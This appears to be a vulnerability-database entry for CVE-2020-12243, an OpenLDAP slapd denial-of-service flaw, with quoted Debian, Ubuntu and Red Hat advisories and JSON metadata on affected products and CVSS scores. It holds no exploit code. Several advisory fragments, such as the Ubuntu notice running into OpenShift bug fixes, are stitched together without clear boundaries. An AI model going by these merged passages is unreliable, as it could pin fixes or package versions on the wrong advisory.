iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAl6ofsxfFIAAAAAALgAo aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2 NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xND z0Qx4Q//dOnPiP6bKHrFUFtyv59tV5Zpa1jJ6BmIr3/5ueODnBu8MHLJw8503zLJ I43LDTzvGkXrxy0Y28YC5Qpv1oHW3gvPzFsTrn2DObeUnHlKOOUsyzz3saHXyyzQ ki+2UGsUXydSazDMeJzcoMfRdVpCtjc+GNTb/y7nxgwoKrz/WJplGstp2ibd8ftv Ju4uT8VJZcC3IEGhkYXJ7TENlegOK2FCewYMZARrNT/tjIDyAqfKi2muCg7oadx/ 5WZGLW7Pdw25jFknVy/Y7fEyJDWQdPH7NchK5tZy6D1lWQh67GcvJFSo5HICwb+n FilP29mIBbS96JQq6u5jWWMpAD6RPCtIltak4QdYptjdrQnTDFy3RJSTdZeis8ty HKwYJgNzVG6SCy04t3D+zeMbgEZOvj6GWrURQUqZJQmc4V9l89E0/D7zV3AX9Q9v 0hKEtpc//bZrS71QVqJvkWvrgfutB72Vnqfull+DBxvt33ma5W2il6kxGMwJK3S9 0lk60dzEDCdYp8TE61y8N4z+2IB/Otg9Ni2I8pmaE5s1/ZUva+8GhSjbmGyIhbpk p55kTiZUgpmu6EK2Kvjkh9rMlaa1IHXL8tdrbo8pRVtQHlA8/HUgoGiUHuX1h+Kw LZVjIV/L4qOFQ54uMbSscZgMEvhfW00fe3o2zI8WQZ9IPCQ3oRg= =K3JD -----END PGP SIGNATURE----- . ========================================================================= Ubuntu Security Notice USN-4352-2 May 06, 2020
openldap vulnerability
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 14.04 ESM
- Ubuntu 12.04 ESM
Summary:
OpenLDAP could be made to crash if it received specially crafted network traffic.
Software Description: - openldap: Lightweight Directory Access Protocol
Details:
USN-4352-1 fixed a vulnerability in OpenLDAP. This update provides the corresponding update for Ubuntu 12.04 ESM and Ubuntu 14.04 ESM.
Original advisory details:
It was discovered that OpenLDAP incorrectly handled certain queries. A remote attacker could possibly use this issue to cause OpenLDAP to consume resources, resulting in a denial of service.
Update instructions:
The problem can be corrected by updating your system to the following package versions:
Ubuntu 14.04 ESM: slapd 2.4.31-1+nmu2ubuntu8.5+esm2
Ubuntu 12.04 ESM: slapd 2.4.28-1.1ubuntu4.10
In general, a standard system update will make all the necessary changes.
Bug Fix(es):
-
Gather image registry config (backport to 4.3) (BZ#1836815)
-
Builds fail after running postCommit script if OCP cluster is configured with a container registry whitelist (BZ#1849176)
-
Login with OpenShift not working after cluster upgrade (BZ#1852429)
-
Limit the size of gathered federated metrics from alerts in Insights Operator (BZ#1874018)
-
[4.3] Storage operator stops reconciling when going Upgradeable=False on v1alpha1 CRDs (BZ#1879110)
-
[release 4.3] OpenShift APIs become unavailable for more than 15 minutes after one of master nodes went down(OAuth) (BZ#1880293)
You may download the oc tool and use it to inspect release image metadata as follows:
(For x86_64 architecture)
$ oc adm release info quay.io/openshift-release-dev/ocp-release:4.3.40-x86_64
The image digest is sha256:9ff90174a170379e90a9ead6e0d8cf6f439004191f80762764a5ca3dbaab01dc
(For s390x architecture)
$ oc adm release info quay.io/openshift-release-dev/ocp-release:4.3.40-s390x The image digest is sha256:605ddde0442e604cfe2d6bd1541ce48df5956fe626edf9cc95b1fca75d231b64
(For ppc64le architecture)
$ oc adm release info quay.io/openshift-release-dev/ocp-release:4.3.40-ppc64le
The image digest is sha256:d3c9e391c145338eae3feb7f6a4e487dadc8139a353117d642fe686d277bcccc
- Solution:
For OpenShift Container Platform 4.3 see the following documentation, which will be updated shortly for this release, for important instructions on how to upgrade your cluster and fully apply this asynchronous errata update:
https://docs.openshift.com/container-platform/4.3/release_notes/ocp-4-3-rel ease-notes.html
Details on how to access this content are available at https://docs.openshift.com/container-platform/4.3/updating/updating-cluster - -cli.html. Bugs fixed (https://bugzilla.redhat.com/):
1804533 - CVE-2020-9283 golang.org/x/crypto: Processing of crafted ssh-ed25519 public keys allows for panic 1836815 - Gather image registry config (backport to 4.3) 1849176 - Builds fail after running postCommit script if OCP cluster is configured with a container registry whitelist 1874018 - Limit the size of gathered federated metrics from alerts in Insights Operator 1874399 - [DR] etcd-member-recover.sh fails to pull image with unauthorized 1879110 - [4.3] Storage operator stops reconciling when going Upgradeable=False on v1alpha1 CRDs
- -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256
====================================================================
Red Hat Security Advisory
Synopsis: Moderate: Red Hat Ansible Automation Platform Operator 1.2 security update Advisory ID: RHSA-2021:1079-01 Product: Red Hat Ansible Automation Platform Advisory URL: https://access.redhat.com/errata/RHSA-2021:1079 Issue date: 2021-04-06 Keywords: Security Update CVE Names: CVE-2017-12652 CVE-2018-20843 CVE-2019-5094 CVE-2019-5188 CVE-2019-11719 CVE-2019-11727 CVE-2019-11756 CVE-2019-12749 CVE-2019-14866 CVE-2019-14973 CVE-2019-15903 CVE-2019-17006 CVE-2019-17023 CVE-2019-17498 CVE-2019-17546 CVE-2019-19956 CVE-2019-20388 CVE-2019-20907 CVE-2020-1971 CVE-2020-5313 CVE-2020-6829 CVE-2020-7595 CVE-2020-8177 CVE-2020-8625 CVE-2020-12243 CVE-2020-12400 CVE-2020-12401 CVE-2020-12402 CVE-2020-12403 CVE-2020-14422 CVE-2020-15999 CVE-2021-3156 CVE-2021-3447 CVE-2021-20178 CVE-2021-20180 CVE-2021-20191 CVE-2021-20228 ==================================================================== 1. Summary:
Red Hat Ansible Automation Platform Resource Operator 1.2 (technical preview) images that fix several security issues.
Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
- Description:
Red Hat Ansible Automation Platform Resource Operator container images with security fixes.
Ansible Automation Platform manages Ansible Platform jobs and workflows that can interface with any infrastructure on a Red Hat OpenShift Container Platform cluster, or on a traditional infrastructure that is running off-cluster.
Security fixes:
CVE-2021-20191 ansible: multiple modules expose secured values [ansible_automation_platform-1.2] (BZ#1916813)
CVE-2021-20178 ansible: user data leak in snmp_facts module [ansible_automation_platform-1.2] (BZ#1914774)
CVE-2021-20180 ansible: ansible module: bitbucket_pipeline_variable exposes secured values [ansible_automation_platform-1.2] (BZ#1915808)
CVE-2021-20228 ansible: basic.py no_log with fallback option [ansible_automation_platform-1.2] (BZ#1925002)
CVE-2021-3447 ansible: multiple modules expose secured values [ansible_automation_platform-1.2] (BZ#1939349)
For more details about the security issue, including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
- Solution:
Before applying this update, make sure all previously released errata relevant to your system have been applied.
For details on how to apply this update, refer to:
https://access.redhat.com/articles/11258
- Bugs fixed (https://bugzilla.redhat.com/):
1914774 - CVE-2021-20178 ansible: user data leak in snmp_facts module 1915808 - CVE-2021-20180 ansible module: bitbucket_pipeline_variable exposes secured values 1916813 - CVE-2021-20191 ansible: multiple modules expose secured values 1925002 - CVE-2021-20228 ansible: basic.py no_log with fallback option 1939349 - CVE-2021-3447 ansible: multiple modules expose secured values
- References:
https://access.redhat.com/security/cve/CVE-2017-12652 https://access.redhat.com/security/cve/CVE-2018-20843 https://access.redhat.com/security/cve/CVE-2019-5094 https://access.redhat.com/security/cve/CVE-2019-5188 https://access.redhat.com/security/cve/CVE-2019-11719 https://access.redhat.com/security/cve/CVE-2019-11727 https://access.redhat.com/security/cve/CVE-2019-11756 https://access.redhat.com/security/cve/CVE-2019-12749 https://access.redhat.com/security/cve/CVE-2019-14866 https://access.redhat.com/security/cve/CVE-2019-14973 https://access.redhat.com/security/cve/CVE-2019-15903 https://access.redhat.com/security/cve/CVE-2019-17006 https://access.redhat.com/security/cve/CVE-2019-17023 https://access.redhat.com/security/cve/CVE-2019-17498 https://access.redhat.com/security/cve/CVE-2019-17546 https://access.redhat.com/security/cve/CVE-2019-19956 https://access.redhat.com/security/cve/CVE-2019-20388 https://access.redhat.com/security/cve/CVE-2019-20907 https://access.redhat.com/security/cve/CVE-2020-1971 https://access.redhat.com/security/cve/CVE-2020-5313 https://access.redhat.com/security/cve/CVE-2020-6829 https://access.redhat.com/security/cve/CVE-2020-7595 https://access.redhat.com/security/cve/CVE-2020-8177 https://access.redhat.com/security/cve/CVE-2020-8625 https://access.redhat.com/security/cve/CVE-2020-12243 https://access.redhat.com/security/cve/CVE-2020-12400 https://access.redhat.com/security/cve/CVE-2020-12401 https://access.redhat.com/security/cve/CVE-2020-12402 https://access.redhat.com/security/cve/CVE-2020-12403 https://access.redhat.com/security/cve/CVE-2020-14422 https://access.redhat.com/security/cve/CVE-2020-15999 https://access.redhat.com/security/cve/CVE-2021-3156 https://access.redhat.com/security/cve/CVE-2021-3447 https://access.redhat.com/security/cve/CVE-2021-20178 https://access.redhat.com/security/cve/CVE-2021-20180 https://access.redhat.com/security/cve/CVE-2021-20191 https://access.redhat.com/security/cve/CVE-2021-20228 https://access.redhat.com/security/updates/classification/#moderate https://access.redhat.com/security/cve/CVE-2021-20191 https://access.redhat.com/security/cve/CVE-2021-20178 https://access.redhat.com/security/cve/CVE-2021-20180 https://access.redhat.com/security/cve/CVE-2021-20228 https://access.redhat.com/security/cve/CVE-2021-3447
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2021 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1
iQIVAwUBYHBeatzjgjWX9erEAQhLuw//QLV4QWc4E9o8cG3IJr3xIt6b/OHs6b9s hp04e5kT7IWFpmR3VXK+BEK2dd+NiGdvXPOpwe4BaOUWEDmq+dx4Vac5Z0GcZJUK AJz8dXFPYBgIafuIkWyY9UIvSO/VsQ2Dr4+KUnB1obALAz3ndSoQJFS1hysFBXHS +MulKiYVwFw7UbfvGuFLjmLrNTAflVa9MHmdh3P53bU+U2mCgzuHTFIpodkZhuIt aIR0H/dgHXXG8co20Zb5Nciqr0CxqejQ+xz84Yu0I+y1LWdBAhi34c3zJY4rlEQS 6/nfcsSPEadNCTXQu/TX6yvo6sE8A7/xGh1PDf0PLVv+Xh7TE53MtmTnYcl8uiRO 9m3CfJ7PLO2hpl6QuJzuUe7nXx65/qIoKQjZfNpZVXj/LQtL1F4RE7szmswIGNZL IG51pYEUE98aR3gIlLpoMjW4vtC+rdcwSBaLW5gH1Q5hNRlTLmFBTKmYNkCpd4Ho NP3AKEwx9R8ZdGYcCuZwYPvSQSqX+B9qURw5G4E/vbso8Vh9RYQ3kusnf93Q/1LG ImHCbsVWJDMMt/NRj5OvqgZc18ROqHhSpuJ+A44VCI+UihkZb2ai4DjGef0WHZhq XTMyLECTJIwM4aY+BC1ohYm0Whvs/w/hd03tGFBJhlIoBYakY6o8lRD7hCc8E/YI dEQ0aSabgEY=D/Lt -----END PGP SIGNATURE-----
-- RHSA-announce mailing list RHSA-announce@redhat.com https://listman.redhat.com/mailman/listinfo/rhsa-announce . Description:
-
Updated python-psutil version to 5.6.6 inside ansible-runner container (CVE-2019-18874)
-
Solution:
For information on upgrading Ansible Tower, reference the Ansible Tower Upgrade and Migration Guide: https://docs.ansible.com/ansible-tower/latest/html/upgrade-migration-guide/ index.html
- Bugs fixed (https://bugzilla.redhat.com/):
1772014 - CVE-2019-18874 python-psutil: double free because of refcount mishandling
5
Show details on source website{
"affected_products": {
"_id": null,
"data": [
{
"_id": null,
"model": "steelstore cloud integrated storage",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "ubuntu linux",
"scope": "eq",
"trust": 1.0,
"vendor": "canonical",
"version": "12.04"
},
{
"_id": null,
"model": "linux",
"scope": "eq",
"trust": 1.0,
"vendor": "debian",
"version": "10.0"
},
{
"_id": null,
"model": "solaris",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "10"
},
{
"_id": null,
"model": "mac os x",
"scope": "lt",
"trust": 1.0,
"vendor": "apple",
"version": "10.15.6"
},
{
"_id": null,
"model": "h300s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "h300e",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "zfs storage appliance kit",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "8.8"
},
{
"_id": null,
"model": "ubuntu linux",
"scope": "eq",
"trust": 1.0,
"vendor": "canonical",
"version": "18.04"
},
{
"_id": null,
"model": "h700e",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "h500s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "mac os x",
"scope": "lt",
"trust": 1.0,
"vendor": "apple",
"version": "10.14.6"
},
{
"_id": null,
"model": "ubuntu linux",
"scope": "eq",
"trust": 1.0,
"vendor": "canonical",
"version": "16.04"
},
{
"_id": null,
"model": "mac os x",
"scope": "gte",
"trust": 1.0,
"vendor": "apple",
"version": "10.15"
},
{
"_id": null,
"model": "mac os x",
"scope": "lt",
"trust": 1.0,
"vendor": "apple",
"version": "10.13.6"
},
{
"_id": null,
"model": "ubuntu linux",
"scope": "eq",
"trust": 1.0,
"vendor": "canonical",
"version": "14.04"
},
{
"_id": null,
"model": "h410c",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "solaris",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "11"
},
{
"_id": null,
"model": "mac os x",
"scope": "eq",
"trust": 1.0,
"vendor": "apple",
"version": "10.14.6"
},
{
"_id": null,
"model": "mac os x",
"scope": "gte",
"trust": 1.0,
"vendor": "apple",
"version": "10.14.0"
},
{
"_id": null,
"model": "ubuntu linux",
"scope": "eq",
"trust": 1.0,
"vendor": "canonical",
"version": "20.04"
},
{
"_id": null,
"model": "cloud backup",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "mac os x",
"scope": "gte",
"trust": 1.0,
"vendor": "apple",
"version": "10.13.0"
},
{
"_id": null,
"model": "brocade fabric operating system",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": null
},
{
"_id": null,
"model": "linux",
"scope": "eq",
"trust": 1.0,
"vendor": "debian",
"version": "8.0"
},
{
"_id": null,
"model": "ubuntu linux",
"scope": "eq",
"trust": 1.0,
"vendor": "canonical",
"version": "19.10"
},
{
"_id": null,
"model": "h500e",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "mac os x",
"scope": "eq",
"trust": 1.0,
"vendor": "apple",
"version": "10.13.6"
},
{
"_id": null,
"model": "leap",
"scope": "eq",
"trust": 1.0,
"vendor": "opensuse",
"version": "15.1"
},
{
"_id": null,
"model": "h700s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "openldap",
"scope": "lt",
"trust": 1.0,
"vendor": "openldap",
"version": "2.4.50"
},
{
"_id": null,
"model": "h410s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "linux",
"scope": "eq",
"trust": 1.0,
"vendor": "debian",
"version": "9.0"
},
{
"_id": null,
"model": "gnu/linux",
"scope": null,
"trust": 0.8,
"vendor": "debian",
"version": null
},
{
"_id": null,
"model": "openldap",
"scope": "eq",
"trust": 0.8,
"vendor": "openldap",
"version": "2.4.50"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-005084"
},
{
"db": "NVD",
"id": "CVE-2020-12243"
}
]
},
"configurations": {
"_id": null,
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/o:debian:debian_linux",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:openldap:openldap",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-005084"
}
]
},
"credits": {
"_id": null,
"data": "Red Hat",
"sources": [
{
"db": "PACKETSTORM",
"id": "159661"
},
{
"db": "PACKETSTORM",
"id": "162142"
},
{
"db": "PACKETSTORM",
"id": "159553"
},
{
"db": "PACKETSTORM",
"id": "159552"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-2326"
}
],
"trust": 1.0
},
"cve": "CVE-2020-12243",
"cvss": {
"_id": null,
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "PARTIAL",
"baseScore": 5.0,
"confidentialityImpact": "NONE",
"exploitabilityScore": 10.0,
"id": "CVE-2020-12243",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 1.1,
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Partial",
"baseScore": 5.0,
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "JVNDB-2020-005084",
"impactScore": null,
"integrityImpact": "None",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "PARTIAL",
"baseScore": 5.0,
"confidentialityImpact": "NONE",
"exploitabilityScore": 10.0,
"id": "VHN-164902",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:N/I:N/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"exploitabilityScore": 3.9,
"id": "CVE-2020-12243",
"impactScore": 3.6,
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 7.5,
"baseSeverity": "High",
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "JVNDB-2020-005084",
"impactScore": null,
"integrityImpact": "None",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2020-12243",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "NVD",
"id": "JVNDB-2020-005084",
"trust": 0.8,
"value": "High"
},
{
"author": "CNNVD",
"id": "CNNVD-202004-2326",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-164902",
"trust": 0.1,
"value": "MEDIUM"
},
{
"author": "VULMON",
"id": "CVE-2020-12243",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-164902"
},
{
"db": "VULMON",
"id": "CVE-2020-12243"
},
{
"db": "CNNVD",
"id": "CNNVD-202004-2326"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-005084"
},
{
"db": "NVD",
"id": "CVE-2020-12243"
}
]
},
"description": {
"_id": null,
"data": "In filter.c in slapd in OpenLDAP before 2.4.50, LDAP search filters with nested boolean expressions can result in denial of service (daemon crash). OpenLDAP Exists in a resource exhaustion vulnerability.Service operation interruption (DoS) It may be put into a state. The filter.c file of slapd in versions earlier than OpenLDAP 2.4.50 has a security vulnerability. \n\nFor the oldstable distribution (stretch), this problem has been fixed\nin version 2.4.44+dfsg-5+deb9u4. \n\nFor the stable distribution (buster), this problem has been fixed in\nversion 2.4.47+dfsg-3+deb10u2. \n\nWe recommend that you upgrade your openldap packages. \n\nFor the detailed security status of openldap please refer to its\nsecurity tracker page at:\nhttps://security-tracker.debian.org/tracker/openldap\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n-----BEGIN PGP SIGNATURE-----\n\niQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAl6ofsxfFIAAAAAALgAo\naXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2\nNDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xND\nz0Qx4Q//dOnPiP6bKHrFUFtyv59tV5Zpa1jJ6BmIr3/5ueODnBu8MHLJw8503zLJ\nI43LDTzvGkXrxy0Y28YC5Qpv1oHW3gvPzFsTrn2DObeUnHlKOOUsyzz3saHXyyzQ\nki+2UGsUXydSazDMeJzcoMfRdVpCtjc+GNTb/y7nxgwoKrz/WJplGstp2ibd8ftv\nJu4uT8VJZcC3IEGhkYXJ7TENlegOK2FCewYMZARrNT/tjIDyAqfKi2muCg7oadx/\n5WZGLW7Pdw25jFknVy/Y7fEyJDWQdPH7NchK5tZy6D1lWQh67GcvJFSo5HICwb+n\nFilP29mIBbS96JQq6u5jWWMpAD6RPCtIltak4QdYptjdrQnTDFy3RJSTdZeis8ty\nHKwYJgNzVG6SCy04t3D+zeMbgEZOvj6GWrURQUqZJQmc4V9l89E0/D7zV3AX9Q9v\n0hKEtpc//bZrS71QVqJvkWvrgfutB72Vnqfull+DBxvt33ma5W2il6kxGMwJK3S9\n0lk60dzEDCdYp8TE61y8N4z+2IB/Otg9Ni2I8pmaE5s1/ZUva+8GhSjbmGyIhbpk\np55kTiZUgpmu6EK2Kvjkh9rMlaa1IHXL8tdrbo8pRVtQHlA8/HUgoGiUHuX1h+Kw\nLZVjIV/L4qOFQ54uMbSscZgMEvhfW00fe3o2zI8WQZ9IPCQ3oRg=\n=K3JD\n-----END PGP SIGNATURE-----\n. =========================================================================\nUbuntu Security Notice USN-4352-2\nMay 06, 2020\n\nopenldap vulnerability\n=========================================================================\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 14.04 ESM\n- Ubuntu 12.04 ESM\n\nSummary:\n\nOpenLDAP could be made to crash if it received specially crafted\nnetwork traffic. \n\nSoftware Description:\n- openldap: Lightweight Directory Access Protocol\n\nDetails:\n\nUSN-4352-1 fixed a vulnerability in OpenLDAP. This update provides\nthe corresponding update for Ubuntu 12.04 ESM and Ubuntu 14.04 ESM. \n\nOriginal advisory details:\n\n It was discovered that OpenLDAP incorrectly handled certain queries. A\n remote attacker could possibly use this issue to cause OpenLDAP to consume\n resources, resulting in a denial of service. \n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 14.04 ESM:\n slapd 2.4.31-1+nmu2ubuntu8.5+esm2\n\nUbuntu 12.04 ESM:\n slapd 2.4.28-1.1ubuntu4.10\n\nIn general, a standard system update will make all the necessary changes. \n\nBug Fix(es):\n\n* Gather image registry config (backport to 4.3) (BZ#1836815)\n\n* Builds fail after running postCommit script if OCP cluster is configured\nwith a container registry whitelist (BZ#1849176)\n\n* Login with OpenShift not working after cluster upgrade (BZ#1852429)\n\n* Limit the size of gathered federated metrics from alerts in Insights\nOperator (BZ#1874018)\n\n* [4.3] Storage operator stops reconciling when going Upgradeable=False on\nv1alpha1 CRDs (BZ#1879110)\n\n* [release 4.3] OpenShift APIs become unavailable for more than 15 minutes\nafter one of master nodes went down(OAuth) (BZ#1880293)\n\nYou may download the oc tool and use it to inspect release image metadata\nas follows:\n\n(For x86_64 architecture)\n\n $ oc adm release info\nquay.io/openshift-release-dev/ocp-release:4.3.40-x86_64\n\nThe image digest is\nsha256:9ff90174a170379e90a9ead6e0d8cf6f439004191f80762764a5ca3dbaab01dc\n\n(For s390x architecture)\n\n $ oc adm release info\nquay.io/openshift-release-dev/ocp-release:4.3.40-s390x\nThe image digest is\nsha256:605ddde0442e604cfe2d6bd1541ce48df5956fe626edf9cc95b1fca75d231b64\n\n(For ppc64le architecture)\n\n $ oc adm release info\nquay.io/openshift-release-dev/ocp-release:4.3.40-ppc64le\n\nThe image digest is\nsha256:d3c9e391c145338eae3feb7f6a4e487dadc8139a353117d642fe686d277bcccc\n\n3. Solution:\n\nFor OpenShift Container Platform 4.3 see the following documentation, which\nwill be updated shortly for this release, for important instructions on how\nto upgrade your cluster and fully apply this asynchronous errata update:\n\nhttps://docs.openshift.com/container-platform/4.3/release_notes/ocp-4-3-rel\nease-notes.html\n\nDetails on how to access this content are available at\nhttps://docs.openshift.com/container-platform/4.3/updating/updating-cluster\n- -cli.html. Bugs fixed (https://bugzilla.redhat.com/):\n\n1804533 - CVE-2020-9283 golang.org/x/crypto: Processing of crafted ssh-ed25519 public keys allows for panic\n1836815 - Gather image registry config (backport to 4.3)\n1849176 - Builds fail after running postCommit script if OCP cluster is configured with a container registry whitelist\n1874018 - Limit the size of gathered federated metrics from alerts in Insights Operator\n1874399 - [DR] etcd-member-recover.sh fails to pull image with unauthorized\n1879110 - [4.3] Storage operator stops reconciling when going Upgradeable=False on v1alpha1 CRDs\n\n5. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\n==================================================================== \nRed Hat Security Advisory\n\nSynopsis: Moderate: Red Hat Ansible Automation Platform Operator 1.2 security update\nAdvisory ID: RHSA-2021:1079-01\nProduct: Red Hat Ansible Automation Platform\nAdvisory URL: https://access.redhat.com/errata/RHSA-2021:1079\nIssue date: 2021-04-06\nKeywords: Security Update\nCVE Names: CVE-2017-12652 CVE-2018-20843 CVE-2019-5094\n CVE-2019-5188 CVE-2019-11719 CVE-2019-11727\n CVE-2019-11756 CVE-2019-12749 CVE-2019-14866\n CVE-2019-14973 CVE-2019-15903 CVE-2019-17006\n CVE-2019-17023 CVE-2019-17498 CVE-2019-17546\n CVE-2019-19956 CVE-2019-20388 CVE-2019-20907\n CVE-2020-1971 CVE-2020-5313 CVE-2020-6829\n CVE-2020-7595 CVE-2020-8177 CVE-2020-8625\n CVE-2020-12243 CVE-2020-12400 CVE-2020-12401\n CVE-2020-12402 CVE-2020-12403 CVE-2020-14422\n CVE-2020-15999 CVE-2021-3156 CVE-2021-3447\n CVE-2021-20178 CVE-2021-20180 CVE-2021-20191\n CVE-2021-20228\n====================================================================\n1. Summary:\n\nRed Hat Ansible Automation Platform Resource Operator 1.2 (technical\npreview) images that fix several security issues. \n\nRed Hat Product Security has rated this update as having a security impact\nof Moderate. A Common Vulnerability Scoring System (CVSS) base score, which\ngives a detailed severity rating, is available for each vulnerability from\nthe CVE link(s) in the References section. \n\n2. Description:\n\nRed Hat Ansible Automation Platform Resource Operator container images\nwith security fixes. \n\nAnsible Automation Platform manages Ansible Platform jobs and workflows\nthat can interface with any infrastructure on a Red Hat OpenShift Container\nPlatform cluster, or on a traditional infrastructure that is running\noff-cluster. \n\nSecurity fixes:\n\nCVE-2021-20191 ansible: multiple modules expose secured values\n[ansible_automation_platform-1.2] (BZ#1916813)\n\nCVE-2021-20178 ansible: user data leak in snmp_facts module\n[ansible_automation_platform-1.2] (BZ#1914774)\n\nCVE-2021-20180 ansible: ansible module: bitbucket_pipeline_variable exposes\nsecured values [ansible_automation_platform-1.2] (BZ#1915808)\n\nCVE-2021-20228 ansible: basic.py no_log with fallback option\n[ansible_automation_platform-1.2] (BZ#1925002)\n\nCVE-2021-3447 ansible: multiple modules expose secured values\n[ansible_automation_platform-1.2] (BZ#1939349)\n\nFor more details about the security issue, including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage(s) listed in the References section. \n\n3. Solution:\n\nBefore applying this update, make sure all previously released errata\nrelevant to your system have been applied. \n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258\n\n4. Bugs fixed (https://bugzilla.redhat.com/):\n\n1914774 - CVE-2021-20178 ansible: user data leak in snmp_facts module\n1915808 - CVE-2021-20180 ansible module: bitbucket_pipeline_variable exposes secured values\n1916813 - CVE-2021-20191 ansible: multiple modules expose secured values\n1925002 - CVE-2021-20228 ansible: basic.py no_log with fallback option\n1939349 - CVE-2021-3447 ansible: multiple modules expose secured values\n\n5. 